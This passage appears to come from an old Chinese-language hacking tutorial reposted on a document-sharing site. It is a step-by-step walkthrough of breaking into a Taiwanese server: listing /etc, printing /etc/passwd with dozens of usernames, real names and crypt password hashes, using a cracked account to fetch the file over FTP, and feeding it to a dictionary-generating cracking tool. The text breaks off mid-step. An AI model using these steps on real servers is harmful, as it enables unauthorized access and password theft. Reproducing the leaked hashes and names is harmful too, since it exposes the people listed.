1、/etc$ ls DIR_COLORS hosts.equiv printcap HOSTNAME hosts.lpd profile NETWORKING inet protocols NNTP_INEWS_DOMAIN inetd.conf psdevtab X11 inittab rc.d/ at.deny inittab.gettyps.sample resolv.conf bootptab ioctl.save rpc csh.cshrc issue securetty csh.login securetty.old default/ klogd.pid sendmail.cf di
2、phosts ld.so.cache sendmail.st exports ld.so.conf services fastboot lilo/ shells fdprm lilo.conf shutdownpid fs/ localtime skel/ fstab magic slip.hosts ftp.banner mail.rc slip.login ftp.deny motd snooptab ftpaccess motd.bak sudoers ftpconversions msgs/ syslog.conf ftpgroups mtab syslog.pid ftpusers
3、mtools termcap gateways named.boot ttys gettydefs networks utmp group nntpserver vga/ host.conf passwd wtmp hosts passwd.OLD yp.conf.example hosts.allow passwd.old hosts.deny ppp/ (看看我们的目标长得如何?) /etc$ cat passwd root:abcdefghijklmn:0:/root:/bin/bash bin:*:1:/bin:daemon:2:/sbin:adm:3:4:/var/adm:lp:7:
4、/var/spool/lpd:sync:5:/bin/sync shutdown:6:/sbin/shutdown halt:/sbin/halt mail:8:12:/var/spool/mail:news:9:13:/usr/lib/news:uucp:10:14:/var/spool/uucppublic:operator:11:games:100:/usr/games:man:15:/usr/man:postmaster:nobody:-1:/dev/null:ftp:404:/home/ftp:guest:405:/dev/null shan:Ca3LGA8gqDV4A:501:20
5、:Shan Huang:/home/staff/shan:/U5N5/l0B.jWo:502:WWW Manager:/home/staff/www:test:aFoIbr40sdbiSw:503:/home/test:fax:aHhi5ZoJwWOGtc:504:FAX_SERVICE:/home/staff/fax:women:IiO94G5YrrFfU:505:Perfect Women:/home/w3/women:kanglin:aMjy/8maF4ZPHA:506:Kanglin:/home/w3/kanglin:coffee:AlwDa18Au9IPg:507:Coffee:/h
6、ome/w3/coffee:bakery:aFm7GUGCuyfP2w:508:Bakery:/home/w3/bakery:carven:aPaqr3QAdw8zbk:509:Carven:/home/w3/carven:haurey:/2m87VjXC742s:510:Haurey:/home/w3/haurey:prime:nPOlsQhQFJ.aM:511:Prime:/home/w3/prime:tham:H2AOlPozwIIuo:512:xxxxxxxxxx:/home/w3/tham:ccc:aFiKAE2saiJCMo:513:/home/w3/ccc:sk:UPrcTmnV
7、Skd3w:514:/home/sk:services:9yBqHWfnnNr.k:515:xxxx:/home/w3/haurey/services:order:LpnMHVjy9M/YU:516:/home/w3/haurey/order:corey:mhRsFO60hFsMU:517:/home/w3/haurey/corey:richard:EmUWnU6Bj7hQI:519:/home/w3/richard:lilian:Opx5xwctJTO1A:520:/home/w3/lilian:support:JdOqvTZqdZ9wQ:521:/home/w3/support:hotli
8、ne:BiSzCJsDhVl7c:522:/home/w3/hotline:stonny:/UNPsb9La4nwI:523:/home/staff/stonny:/bin/csh bear:w/eF/cZ32oMho:524:/home/w3/bear:lance:Pf7USG6iwgBEI:525:Chien-chia Lan:/home/staff/lance:/bin/tcsh taiwankk:ijPWXFmRF79RY:526:/home/w3/taiwankk:service:ulfWaOzIHC.M.:527:prime service:/home/w3/service:lih
9、eng:6hGixt6Kgezmo:528:prime liheng:/home/w3/liheng:caves:RyvviMcWTTRnc:529:gallery:/home/w3/caves:sales:CmtV4FZsBIPvQ:518:/home/w3/prime/sales:kingtel:8E7f0PIQWfCmQ:530:/home/w3/kingtel:recycle1:JgbZHVRE4Jf3U:531:/home/w3/recycle1:recycle2:Qg85xgdnsqJYM:532:/home/w3/recycle2:recycle3:XhyoUBFQspiS2:5
10、33:/home/w3/recycle3:recycle:109mNZYIZtNEM:534:/home/w3/recycle:hxnet:KhB./jHw.XNUI:536:/home/w3/hxnet:goodbook:MlD0tx.urQMYc:535:/home/w3/goodbook:sales1:JmKzPOBMIIYUI:537:/home/w3/prime/sales1:rwu:Pai8mYCRQwvcs:539:/home/w3/kingtel/rwu:charliex:Of6HaxdxkDBDw:540:/home/w3/kingtel/charliex:jdlee:Mhq
11、3gZNup9E3Q:538:/home/w3/kingtel/jdlee:tkchen:GkTU8ecYIXEyw:541:/home/w3/kingtel/tkchen:slb:Olf22.gHBZ.QQ:542:/home/w3/kingtel/slb:s6t4:GnHFCPdZX7nkU:543:/home/w3/kingtel/s6t4:lsh:GftygyOntHY6Y:545:/home/w3/kingtel/lsh:lilly:DhKHmlKPE6tRk:544:/home/w3/kingtel/lilly:nalcom:MhHdQ1mvge9WQ:546:/home/w3/p
12、rime/nalcom:jordon:mPgNPVEkIEORM:547:/home/w3/jordon:toonfish:wTscIuas4EeTE:548:/home/w3/toonfish:yahoo:If.UlNFTal.bk:549:/home/w3/yahoo:basic:IgLUu9J03lbyU:550:/home/w3/basic:wunan:QUHEiPefAaKsU:551:xxxxxxxx:/home/w3/wunan:kaoune:eVwM44uTLOpnY:552:/home/w3/wunan/kaoune:shuchuan:KgPlk7TT6pmBk:553:/h
13、ome/w3/wunan/shuchuan:fan:Jk6E9PqP7xemg:554:/home/w3/toonfish/fan:(CoolFire 注: 因为使用 PaSs2DiC 很容易找出 ID 与 Password 相同的. 故除了 Coffee外, 其它我找到密码的 EnCode Password 部份皆改过. 除非你一个一个试啦 我没说喔!/etc$ exit logout Connection closed by foreign host. (可以走了 ! 改用 FTP 将 /etc/passwd 给抓回来吧! ftp .tw 220- 220- 欢 迎 光 临 . 以下略!2
14、20- There are 0 users in FTP Server now. 220- 目前已有 0 使用者在此 Server 上. 220- If you have any suggestion, please mail to:220- servicexx.xxxxxxx.xxx.xx. 220 www FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready. (还是使用刚刚的帐号进入) Name (.tw:YourName): coffee 331 Password required for coffee. 23
15、0 User coffee logged in. Remote system type is UNIX. Using binary mode to transfer files. (直接到达档案放置地点) ftp cd /etc 250 CWD command successful. ls 200 PORT command successful. 150 Opening ASCII mode data connection for file list. ttys fdprm group issue motd mtools profile securetty shells termcap ske
16、l csh.cshrc csh.login lilo inet default services HOSTNAME DIR_COLORS passwd passwd.OLD wtmp utmp gettydefs inittab.gettyps.sample ld.so.conf ld.so.cache at.deny fs magic rc.d syslog.conf printcap inittab sudoers vga diphosts mail.rc ppp NNTP_INEWS_DOMAIN sendmail.st NETWORKING gateways bootptab expo
17、rts ftpusers host.conf hosts hosts.allow hosts.deny hosts.equiv inetd.conf named.boot networks nntpserver protocols resolv.conf rpc ftpaccess hosts.lpd ftpconversions snooptab msgs ftpgroups slip.login slip.hosts yp.conf.example X11 lilo.conf sendmail.cf fstab fastboot mtab syslog.pid klogd.pid shut
18、downpid localtime passwd.old ioctl.save psdevtab ftp.banner ftp.deny motd.bak securetty.old 226 Transfer complete. (取回该档案) get passwd 150 Opening BINARY mode data connection for passwd (4081 bytes). 4081 bytes received in 2.5 seconds (1.6 Kbytes/s) (尽速离开) bye 221 Goodbye. 好了! 有了 /etc/passwd 之後一切都好办了
19、, 赶紧将你的宝贝收藏 PaSs2DiC 拿出来吧!快点跑一下, 让它自动产生字典档案:C:hackpass2dic PaSs2DiC V0.2 (C)1996 By FETAG Software Development Co. R.O.C. TAIWAN. This tool will:1 Load PASSWD file and convert it to only username text file 2 Write the file to a dictionary file you choise for target Your Source PASSWD File Name: passwd Your Target Dictionary Name: dic.cfe PaSs2DiC Author: James Lin E-Mail: fetag.tw FETAG Software Development Co: .tw/fetag (这样就好了 ! 自动产生的档案会放在 dic.cfe 这个档案中, 咱们跑一下 B
copyright@ 2008-2022 冰豆网网站版权所有
经营许可证编号:鄂ICP备2022015515号-1
升级会员 